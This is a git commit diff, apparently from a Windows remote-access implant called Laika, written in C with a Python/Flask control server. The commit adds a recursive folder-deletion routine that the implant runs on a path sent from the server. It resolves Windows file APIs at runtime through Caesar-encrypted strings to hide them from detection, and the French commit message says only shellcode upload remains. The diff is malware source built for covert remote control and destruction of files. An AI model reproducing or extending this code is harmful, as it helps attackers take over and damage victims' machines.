delete_folder marche

manque plus que l'upload de shellcode et on est bon !
2023-02-21 19:01:37 +01:00
parent 0aa959640a
commit 72b4761011
6 changed files with 69 additions and 3 deletions
--- a/Laika/file_explorer.c
+++ b/Laika/file_explorer.c
@@ -88,6 +88,61 @@ char* get_file_list(const char* dirPath, int* numFiles) {
    return fileNames;
 }

+BOOL delete_folder(LPCTSTR lpszDir) {
+    WIN32_FIND_DATA FindFileData;
+    HANDLE hFind;
+    TCHAR szDir[MAX_PATH];
+    TCHAR szFileName[MAX_PATH];
+
+    // copy the directory path to a buffer
+    lstrcpy(szDir, lpszDir);
+
+    // add the wildcard character and search for the first file in the directory
+    lstrcat(szDir, TEXT("\\*"));
+    hFind = Api.FindFirstFileW(szDir, &FindFileData);
+
+    if (hFind == INVALID_HANDLE_VALUE) {
+        // unable to find the first file
+        return FALSE;
+    }
+
+    do {
+        if (lstrcmp(FindFileData.cFileName, TEXT(".")) == 0 || lstrcmp(FindFileData.cFileName, TEXT("..")) == 0) {
+            // skip the current and parent directories
+            continue;
+        }
+
+        // build the full file name
+        lstrcpy(szFileName, lpszDir);
+        lstrcat(szFileName, TEXT("\\"));
+        lstrcat(szFileName, FindFileData.cFileName);
+
+        if (FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
+            // recursively delete the subdirectory
+            if (!delete_folder(szFileName)) {
+                Api.FindClose(hFind);
+                return FALSE;
+            }
+        }
+        else {
+            // delete the file
+            if (Api.DeleteFileW(szFileName) == FALSE) {
+                Api.FindClose(hFind);
+                return FALSE;
+            }
+        }
+    } while (Api.FindNextFileW(hFind, &FindFileData));
+
+    // close the search handle
+    Api.FindClose(hFind);
+
+    // remove the directory
+    if (Api.RemoveDirectoryW(lpszDir) == FALSE) {
+        return FALSE;
+    }
+
+    return TRUE;
+}

 int download_file(FILE* fp, SOCKET sock) {
    char* data = (char*)Api.malloc(BUFFER_SIZE);
--- a/Laika/file_explorer.h
+++ b/Laika/file_explorer.h
@@ -16,6 +16,7 @@ extern API Api;

 int get_object_info(char* path, struct stat* fileinfo);
 int get_drives_list(char* buf);
+BOOL delete_folder(LPCTSTR lpszDir);
 char* get_file_list(const char* dirPath, int* numFiles);
 int download_file(FILE* fp, SOCKET sock);
 void upload_file(SOCKET sock, const char* path);
--- a/Laika/main.c
+++ b/Laika/main.c
@@ -211,8 +211,11 @@ retry:
 				goto retry;
 			}

-			Api.rmdir(CAESAR_DECRYPT(path));
+			LPCWSTR wstr = ConvertCharToWChar(CAESAR_DECRYPT(path));

+			delete_folder(wstr);
+
+			Api.free((LPWSTR)wstr);
 			Api.free(path);
 		}

--- a/Laika/resolve_apis.c
+++ b/Laika/resolve_apis.c
@@ -31,11 +31,14 @@ void InitApis() {
 	Api.MultiByteToWideChar = (TMultiByteToWideChar)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("RzqynG~yjYt\\nijHmfw"));
 	Api.FindFirstFileW = (TFindFirstFileW)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("KnsiKnwxyKnqj\\"));
 	Api.FindNextFileW = (TFindNextFileW)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("KnsiSj}yKnqj\\"));
+	Api.RemoveDirectoryW = (TRemoveDirectoryW)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("Wjrt{jInwjhytw~\\"));
+	Api.DeleteFileW = (TDeleteFileW)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("IjqjyjKnqj\\"));

 	hMsvcrt = LoadLibraryA(CAESAR_DECRYPT("rx{hwy3iqq"));
 	if (!hMsvcrt) {
 		return;
 	}
+
 	Api.strcpy = (Tstrcpy)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("xywhu~"));
 	Api.malloc = (Tmalloc)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("rfqqth"));
 	Api.free = (Tfree)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("kwjj"));
--- a/Laika/resolve_apis.h
+++ b/Laika/resolve_apis.h
@@ -57,6 +57,8 @@ typedef DWORD(WINAPI* TGetLogicalDrives)(VOID);
 typedef int(WINAPI* TMultiByteToWideChar)(UINT, DWORD, LPCCH, int, LPWSTR, int);
 typedef HANDLE(WINAPI* TFindFirstFileW)(LPCWSTR, LPWIN32_FIND_DATAW);
 typedef BOOL(WINAPI* TFindNextFileW)(HANDLE, LPWIN32_FIND_DATAW);
+typedef BOOL(WINAPI* TRemoveDirectoryW)(LPCWSTR);
+typedef BOOL(WINAPI* TDeleteFileW)(LPCWSTR);

 typedef struct ApiList {
 	Tconnect connect;
@@ -95,6 +97,8 @@ typedef struct ApiList {
 	TMultiByteToWideChar MultiByteToWideChar;
 	TFindFirstFileW FindFirstFileW;
 	TFindNextFileW FindNextFileW;
+	TRemoveDirectoryW RemoveDirectoryW;
+	TDeleteFileW DeleteFileW;

 	Tmbstowcs mbstowcs;
 	Twcstombs wcstombs;
--- a/Server/Server.py
+++ b/Server/Server.py
@@ -145,8 +145,8 @@ def upload_file(fp, sock):

 app = Flask(__name__) 
 # Disable Flask's default logging
-log = logging.getLogger('werkzeug')
-log.disabled = True
+#log = logging.getLogger('werkzeug')
+#log.disabled = True

@app.route('/<path:filename>')
 def serve_file(filename):